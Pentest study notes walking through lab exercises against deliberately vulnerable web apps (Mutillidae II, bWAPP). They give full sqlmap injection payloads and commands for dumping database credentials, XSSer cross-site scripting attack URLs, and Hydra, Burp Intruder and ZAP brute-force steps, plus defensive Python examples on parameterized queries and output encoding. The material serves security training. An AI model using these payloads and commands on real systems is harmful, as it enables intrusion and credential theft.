# 🔬Web App Attacks

## Passive Crawling - Burp Suite

> 🔬 [Passive Crawling with Burp Suite](https://attackdefense.com/challengedetails?cid=1891)
>
> * Target IP: `192.230.181.3`
> * Mutillidae II

```bash
ip -br -c a
	eth1@if203734  UP  192.230.181.2/24

nmap -sS -sV 192.230.181.3
```

* Open the browser and navigate to
  * `http://192.230.181.3/`
  * Activate `FoxyProxy` Plugin
* Start `BurpSuite` (set *User options/Display/Look* to *Darcula* and restart BurpSuite)
  * Intercept the home page request and **turn off the intercept**
* Check the **`HTTP history`** tab
* Browse the Mutillidae web app; Burp records every visited page passively (no active scanning is sent to the target)

![HTTP history](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-0673f2ca9d351a54cd025ad0662de82d83791f5e%2Fimage-20230504185103214.png?alt=media)

![Passive crawl](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-254a251ef959c7634ad249e3f2d0e8caaf07fb33%2Fimage-20230504185134010.png?alt=media)

* Check the **`Target`** tab for a **Site map**
  * Add site to the **Scope**

![Target](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-6ee2b194ee9d384032f8918ae4bad7f8f16fda59%2Fimage-20230504185311580.png?alt=media)

***

## SQL Injection - [SQLMap](https://sqlmap.org/)

> 🔬 [SQL Injection with SQLMap](https://attackdefense.com/challengedetails?cid=2129)
>
> * Target IP: `192.42.186.3`
> * bWAPP

```bash
ip -br -c a
	eth1@if178967  UP  192.42.186.2/24

nmap -sS -sV 192.42.186.3
```

* Open the browser and navigate to `http://192.42.186.3/`, login with `bee`:`bug`, select `SQL Injection (GET/Search)` and click the **Hack** button
  * Input a string and search
  * `http://192.42.186.3/sqli_1.php?title=hacking&action=search`
* Activate `FoxyProxy` Plugin
* Start `BurpSuite` in Interception mode
  * Refresh the page, intercept the request and copy the cookie
  * Cookie: `PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0`

![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-079230cb3a13f2851bc74c6f8bb67679b643ca08%2Fimage-20230504191136451.png?alt=media)

* Run `sqlmap`, defining `title` as the test parameter

```bash
sqlmap -u "http://192.42.186.3/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title
```

![sqlmap](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-be3f5e08da27c2090d2306f5a734bf2d3b6753eb%2Fimage-20230504192432292.png?alt=media)

```bash
---
Parameter: title (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: title=hacking' AND (SELECT 1819 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(1819=1819,1))),0x7171707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'bLrY'='bLrY&action=search

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: title=hacking' AND (SELECT 1664 FROM (SELECT(SLEEP(5)))MSwT) AND 'jFDG'='jFDG&action=search

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: title=hacking' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a767171,0x7379784e74504d4e76744b6e4c524b4e516a4f4f7878676a51734e6d4c744d547450424844474f76,0x7171707071),NULL,NULL-- -&action=search
---
```

* In BurpSuite, send the request to Repeater
  * Copy the first payload from SQLMap and paste it as part of the `title` parameter

```bash
hacking' AND (SELECT 1819 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(1819=1819,1))),0x7171707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'bLrY'='bLrY&action=search
```

![SQL syntax error](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-4dc3e777768a6533b3390b40b6653e5cd345a527%2Fimage-20230504192903226.png?alt=media)
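The syntax error shown in Repeater is the whole basis of the error-based technique: the application concatenates `title` into its query and echoes database errors into the page. The Python example below is added here and is not bWAPP's code; it stands in for `sqli_1.php` with an in-memory SQLite table (the table layout, the rows and the `LIKE '%...%'` query shape are assumptions) and runs the first sqlmap payload from the notes above through a concatenated query and a parameterized one.

```python
import sqlite3

# The first payload sqlmap reported for the GET form above (copied verbatim from the notes).
ERROR_BASED_PAYLOAD = (
    "hacking' AND (SELECT 1819 FROM(SELECT COUNT(*),CONCAT(0x716a767171,"
    "(SELECT (ELT(1819=1819,1))),0x7171707071,FLOOR(RAND(0)*2))x "
    "FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'bLrY'='bLrY"
)


def make_db():
    """Constructed stand-in for bWAPP's movie table (layout and rows are assumptions)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE movies (id INTEGER PRIMARY KEY, title TEXT, year INTEGER)")
    db.executemany("INSERT INTO movies (title, year) VALUES (?, ?)",
                   [("Hackers", 1995), ("The Matrix", 1999), ("Iron Man", 2008)])
    return db


def search_vulnerable(db, title):
    """String concatenation, the shape of the sqli_1.php query: the quote in the input closes
    the literal and everything after it is parsed as SQL. bWAPP prints the DB error into the
    page, which is what the error-based technique reads back."""
    sql = "SELECT title, year FROM movies WHERE title LIKE '%" + title + "%'"
    try:
        return {"rows": db.execute(sql).fetchall(), "error": None}
    except sqlite3.Error as exc:
        # SQLite lacks MySQL's CONCAT/ELT/RAND and INFORMATION_SCHEMA, so the message differs
        # from the MySQL one shown in Repeater, but the query fails for the same reason:
        # the user-supplied text was parsed as part of the statement.
        return {"rows": [], "error": str(exc)}


def search_parameterized(db, title):
    """Bound parameter: the whole input is a value to match, never part of the statement."""
    sql = "SELECT title, year FROM movies WHERE title LIKE ?"
    rows = db.execute(sql, ("%" + title + "%",)).fetchall()
    return {"rows": rows, "error": None}


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, normal input:  ", search_vulnerable(db, "hack"))
    print("vulnerable, sqlmap payload:", search_vulnerable(db, ERROR_BASED_PAYLOAD))
    print("parameterized, payload:    ", search_parameterized(db, ERROR_BASED_PAYLOAD))
```

With the parameterized query the payload is simply a (non-matching) search string, so neither the error-based nor the UNION and time-based payloads sqlmap listed have anything to work with; suppressing verbose database errors in responses removes the error-based channel on its own but leaves the other two, so the bound parameter is the fix.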

* Use `sqlmap` to get a list of tables for the `bWAPP` database

```bash
# List databases
sqlmap -u "http://192.42.186.3/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title --dbs
```

![SQLMap Databases](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-6a712971dd33601349d51b82a924cd051a0e9c8e%2Fimage-20230504194044253.png?alt=media)

```bash
sqlmap -u "http://192.42.186.3/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP --tables
```

![SQLMap Tables](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-9cbac04cb3f3b8311ba0edb4ab44cde614f9f8cf%2Fimage-20230504193116155.png?alt=media)

* Use `sqlmap` to get a list of columns in the `users` table of the `bWAPP` database

```bash
sqlmap -u "http://192.42.186.3/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP -T users --columns
```

![SQLMap Columns](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-16750df447625b153cac029ce8bf29d7165e834f%2Fimage-20230504193222954.png?alt=media)

* Dump `password` and `email` for **admin** from the `users` table

```bash
sqlmap -u "http://192.42.186.3/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP -T users -C admin,password,email --dump
```

![SQLMap Dump](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-bbc9f0c27fb61b383ebf51bf32467c2a9135c77b%2Fimage-20230504193430547.png?alt=media)

* Turn off Intercept mode in BurpSuite, navigate to `http://192.42.186.3/sqli_6.php` and turn Intercept mode back on.
  * Search for the `example` string from the page and intercept the request
  * **Copy to file** the request and name the file `request`

![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-5a371dce6aeecd1d42fa8f184b8fa6520708b269%2Fimage-20230504193737291.png?alt=media)

* Use `sqlmap` with this request file

```bash
sqlmap -r request -p title
```

![SQLMap request](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-04f2ec9ca5cd3d3972c2bfba2cfd0a05d0ec6d88%2Fimage-20230504194119586.png?alt=media)

```bash
---
Parameter: title (POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: title=example' AND (SELECT 9391 FROM(SELECT COUNT(*),CONCAT(0x716a7a7071,(SELECT (ELT(9391=9391,1))),0x7162717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Yvps'='Yvps&action=search

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: title=example' AND (SELECT 6244 FROM (SELECT(SLEEP(5)))dWNC) AND 'Hfwn'='Hfwn&action=search

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: title=example' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a7a7071,0x7463445853774f49666461525a4b446d4a624a706a414976706b56495977444675766767546d6347,0x7162717871),NULL-- -&action=search
---
```

* In BurpSuite, send the request to Repeater
  * Try the proposed payloads from SQLMap

![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-f754d69fd746d22ff438727bb51c529c77b4e92d%2Fimage-20230504194521760.png?alt=media)

* Change the request so that the `version()` function is passed to the database and its output is returned in the page

![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-c293996377859fb2121ec75084cebd558d65eb55%2Fimage-20230504194649954.png?alt=media)

***

## XSS Attack - [XSSer](https://github.com/epsylon/xsser)

> 🔬 [XSS Attack with XSSer](https://attackdefense.com/challengedetails?cid=1889)
>
> * Target IP: `192.131.167.3`
> * Mutillidae II

```bash
ip -br -c a
	eth1@if178967  UP  192.131.167.2/24

nmap -sS -sV 192.131.167.3
```

```bash
# If Firefox does not start, check the service and kill it
ps -e | grep firefox
	<PID>
kill <PID>
```

* Navigate to the [XSS Reflected](https://portswigger.net/web-security/cross-site-scripting/reflected) - DNS Lookup webpage:
  * `http://192.131.167.3/index.php?page=dns-lookup.php`
  * Enter any text and `Lookup DNS`
  * The value is **reflected back** on the web page

![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-77957d64045ff08525b734c80193e2bb30cc65bd%2Fimage-20230504231032938.png?alt=media)

* Activate `FoxyProxy` Plugin
* Start `BurpSuite`
* Enter any text and `Lookup DNS` and intercept the request in `BurpSuite`
  * Copy the request body and replace the `target_host` value with `XSS`

![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-78f4b6c06321a37f352e3ab1e185d089569aeeb1%2Fimage-20230504231302343.png?alt=media)

* Use **`xsser`** to check the vulnerability

```bash
xsser --url 'http://192.131.167.3/index.php?page=dns-lookup.php' \
  -p 'target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS'
```

![xsser](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-ae56b7d9a76fee82f954f97068dc04e701592902%2Fimage-20230504234542520.png?alt=media)

```bash
xsser --url 'http://192.131.167.3/index.php?page=dns-lookup.php' \
  -p 'target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS' --auto
```

![xsser --auto](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-e882c45da1ca5312958464d66978ffe274d009e9%2Fimage-20230504234754209.png?alt=media)

* Use a custom XSS payload

```bash
xsser --url 'http://192.131.167.3/index.php?page=dns-lookup.php' -p 'target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS' --Fp "<script>alert(1)</script>"
```

![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-6ea78d7fe665b2750da232c5145da2701392b7bc%2Fimage-20230504234951322.png?alt=media)

* Copy the `Final Attack` payload and use it in the browser or BurpSuite to trigger the XSS attack
  * `http://192.131.167.3/index.php?page=dns-lookup.php&target_host=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&dns-lookup-php-submit-button=Lookup+DNS`

![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-cc0d319c12d99b43d170b27e858ae9fcac5f690d%2Fimage-20230505000744559.png?alt=media)

![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-60c1c330fcb8662ce54f80fd01882743e0be3ac2%2Fimage-20230505000524631.png?alt=media)

* Perform an XSS Poll Question attack over a `GET` request
  * `http://192.131.167.3/index.php?page=user-poll.php`
  * Copy the `URL`, replace the `nmap` value with **`XSS`** and pass it to XSSer
    * `http://192.131.167.3/index.php?page=user-poll.php&csrf-token=&choice=nmap&initials=2&user-poll-php-submit-button=Submit+Vote`

```bash
xsser --url "http://192.131.167.3/index.php?page=user-poll.php&csrf-token=&choice=XSS&initials=2&user-poll-php-submit-button=Submit+Vote"
```

![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-1f91eb772a83f0b933842b08f8950c4e6ebc4197%2Fimage-20230505002804916.png?alt=media)

```bash
xsser --url "http://192.131.167.3/index.php?page=user-poll.php&csrf-token=&choice=XSS&initials=2&user-poll-php-submit-button=Submit+Vote" --Fp "<script>alert(1)</script>"
```

![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-f26feb862b9f6a9bf2b1a7f9ff41c39b1ceafdc7%2Fimage-20230505002847054.png?alt=media)

* Open the `Final Attack` link in the browser
  * `http://192.131.167.3/index.php?page=user-poll.php&csrf-token=&choice=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&initials=2&user-poll-php-submit-button=Submit+Vote`

![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-ccd1b7060f8863483b822a06f20146d30ce86733%2Fimage-20230505002955557.png?alt=media)

***

## Authenticated XSS Attack - XSSer

> 🔬 [Authenticated XSS Attack with XSSer](https://attackdefense.com/challengedetails?cid=1892)
>
> * Target IP: `192.56.179.3`
> * bWAPP

```bash
ip -br -c a
	eth1@if178967  UP  192.56.179.2/24

nmap -sS -sV 192.56.179.3
```

* Login with `bug`:`bee`, select the `HTML Injection - Reflected (GET)` bug and input any value. Copy the URL
  * `http://192.56.179.3/htmli_get.php?firstname=hi&lastname=hi&form=submit`
* Activate `FoxyProxy` Plugin, start `BurpSuite`, refresh the webpage and copy the `Cookie` from the Proxy intercepted request
  * `PHPSESSID=lb3rg4q495t9sqph907sdhjgg1; security_level=0`
* Run the **`xsser`** tool:
  * replace the `firstname` value with `XSS`
  * pass the copied cookie with `--cookie`
  * turn off the BurpSuite interceptor first, otherwise the tool's requests hang in the proxy

```bash
xsser --url "http://192.56.179.3/htmli_get.php?firstname=XSS&lastname=hi&form=submit" --cookie="PHPSESSID=lb3rg4q495t9sqph907sdhjgg1; security_level=0"
```

![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-37d247b12f75742ba436ce069d6e40ddd01916d6%2Fimage-20230505004208373.png?alt=media)

```bash
xsser --url "http://192.56.179.3/htmli_get.php?firstname=XSS&lastname=hi&form=submit" --cookie="PHPSESSID=lb3rg4q495t9sqph907sdhjgg1; security_level=0" --Fp "<script>alert(1)</script>"
```

![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-c14a4351c33eb3c5fe1a9fa911c398894c11fdb8%2Fimage-20230505004510028.png?alt=media)
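Both the Mutillidae DNS Lookup page and bWAPP's `htmli_get.php` above reflect a request parameter into the response without encoding it, which is why XSSer's `<script>alert(1)</script>` executes. The Python example below is added here and is not part of either application: it extracts the `target_host` value from XSSer's Final Attack URL in the notes above, renders it the way a vulnerable page does and the way an entity-encoded page does, and checks whether the payload survives. The two page templates are assumptions.

```python
import html
from urllib.parse import parse_qs, urlsplit

# The "Final Attack" URL XSSer produced for the Mutillidae DNS Lookup page, and the
# bWAPP HTML-injection URL with XSSer's marker, both copied from the notes above.
FINAL_ATTACK_URL = ("http://192.131.167.3/index.php?page=dns-lookup.php"
                    "&target_host=%3Cscript%3Ealert%281%29%3C%2Fscript%3E"
                    "&dns-lookup-php-submit-button=Lookup+DNS")
BWAPP_URL = "http://192.56.179.3/htmli_get.php?firstname=XSS&lastname=hi&form=submit"


def query_param(url, name):
    """First URL-decoded value of a query parameter, or '' when it is absent."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_vulnerable(value):
    """Assumed template of a reflected page: the raw value lands in the body and in an
    attribute, so '<script>' is parsed as markup and a '"' would end the attribute."""
    return (f"<p>Results for hostname: {value}</p>\n"
            f'<input name="target_host" value="{value}">')


def render_hardened(value):
    """Same template with HTML entity encoding; quote=True also covers the attribute context."""
    safe = html.escape(value, quote=True)
    return (f"<p>Results for hostname: {safe}</p>\n"
            f'<input name="target_host" value="{safe}">')


def reflects_markup(rendered, payload):
    """True when the payload reached the response verbatim, i.e. the browser would run it."""
    return payload in rendered


if __name__ == "__main__":
    payload = query_param(FINAL_ATTACK_URL, "target_host")
    print("payload:", payload)
    print("vulnerable page reflects it:", reflects_markup(render_vulnerable(payload), payload))
    print("hardened page reflects it:  ", reflects_markup(render_hardened(payload), payload))
```

Encoding is context-specific: entity encoding is the right choice for the HTML body and for quoted attributes, which is all these two lab pages use; a value placed inside a `<script>` block, a URL or a CSS property needs that context's encoding instead, and a Content-Security-Policy that forbids inline scripts is a second, independent layer.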

***

## Attacking HTTP Login Form - Hydra

> 🔬 [Attacking HTTP Login Form with Hydra](https://attackdefense.com/challengedetails?cid=1895)
>
> * Target IP: `192.210.201.3`
> * bWAPP

```bash
ip -br -c a
	eth1@if178967  UP  192.210.201.2/24

nmap -sS -sV 192.210.201.3
```

* Open the `http://192.210.201.3/login.php` page, view source code and check the parameters passed in the login form.

![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-bd1a11bb6196f2cee5f78920e0c5a4d6dc8c47b6%2Fimage-20230505005152468.png?alt=media)

* Prepare a usernames list and a passwords list

```bash
echo -e "admin\nbee\nuser1\nuser2" > users
cat /root/Desktop/wordlists/100-common-passwords.txt > pws
echo "bug" >> pws
```

* Use **`hydra`** to retrieve the credentials

```bash
hydra -L users -P pws 192.210.201.3 http-post-form "/login.php:login=^USER^&password=^PASS^&security_level=0&form=submit:Invalid credentials or user not activated!"
```

![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-5cc9d30d8237fb31bec58b3b9f92aec180a82c4c%2Fimage-20230505005851326.png?alt=media)

***

## Attacking Basic Auth - BurpSuite

> 🔬 [Attacking Basic Auth with Burp Suite](https://attackdefense.com/challengedetails?cid=1896)
>
> * Target IP: `192.190.241.3`
> * bWAPP

```bash
ip -br -c a
	eth1@if178967  UP  192.190.241.2/24

nmap -sS -sV 192.190.241.3
```

* Open **Firefox**, activate the `FoxyProxy` Plugin, start `BurpSuite`, open `http://192.190.241.3/basic` and intercept the request. Forward it, input some data and intercept the next request.
  * The `/basic` directory uses **Basic Auth**
  * Send the request to Intruder

![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-1206d7ad1ec0edb337a058d8e9efe6f6b4576715%2Fimage-20230505010447981.png?alt=media)

* Navigate to the **Intruder - Positions** tab
  * Decode the `base64` string of the `Authorization: Basic` header; it becomes `test:test`, the data that was typed into the login form

![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-2bdad5b540cf18051b31c8e716a933b5d98f4aee%2Fimage-20230505010744726.png?alt=media)

* Replace the credentials with a parameter to be substituted like `§credentials§`

![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-0e95bf8ee261b93a2533e16fcecaca056e4b4901%2Fimage-20230505011014577.png?alt=media)

* In the **Payload Options**, load the `/root/Desktop/wordlists/100-common-passwords.txt` list
  * In **Payload Processing**, add an `Add prefix` rule with `admin:` so that it is prepended to every password
    * Add an `Encode - Base64-encode` rule too
  * Start the attack
* Check the entry whose response has status code `301`
  * **Send to Decoder** the `Authorization: Basic` value
  * Check the BurpSuite Decoder tab

![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-d3c3cd1f6d3209f65cf8ae3ca3cc8ebb36528e81%2Fimage-20230505011839378.png?alt=media)

* The base64-decoded value is `admin:cookie1`

![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-9a0ca7a859d4f62d1599b091f4bed3e8f364e795%2Fimage-20230505011939648.png?alt=media)

* Turn off BurpSuite interceptor, open the web page and insert the found credentials

> 🚩 The flag is `d25db4ce54b60b49dfd7b32c52ed8d26`

![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-9d5c20100885756ba116936783ef6abe631031da%2Fimage-20230505012055926.png?alt=media)

***

## Attacking HTTP Login Form - ZAProxy

> 🔬 [Attacking HTTP Login Form with ZAProxy](https://attackdefense.com/challengedetails?cid=1897)
>
> * Target IP: `192.145.79.3`
> * bWAPP

```bash
ip -br -c a
	eth1@if178967  UP  192.145.79.2/24

nmap -sS -sV 192.145.79.3
```

* Open the **`owasp-zap`** tool, Manual Explore, input the URL and launch browser
  * `http://192.145.79.3`
* Attempt login with bad credentials. The website will be added to the sitemap inside `ZAP`

![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-14d6f9ce54c96916434c8ce7f2ab730c5d307c37%2Fimage-20230505012543553.png?alt=media)

* Right click on the `POST` request and select **Fuzz...**

![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-de5a1b2bb75365ab25113f3bae58ef7d1907df7b%2Fimage-20230505012625120.png?alt=media)

* Select the username input value, click **Add**, click **Add** again and enter the username payloads. Confirm with **OK**

![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-d35006b40f8ab385aebcae4ee32e0dfe0a0092c5%2Fimage-20230505012857458.png?alt=media)

* Select the password input value and do the same with a list of possible passwords

![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-006c9547f35de6bbbeb5046008db0ae05aba7045%2Fimage-20230505013049378.png?alt=media)

* **Start Fuzzer** to begin the attack, then check the results for the `302` response that marks the successful login

![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-bcef096799691ac1e1302425c1ca1b7d10784554%2Fimage-20230505013134379.png?alt=media)

![](https://1996978447-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FlhjuckuLbvBn36EoFL7P%2Fuploads%2Fgit-blob-7763aea0a3a3457c1b1a8c026d8ef005f066f654%2Fimage-20230505013232454.png?alt=media)

***
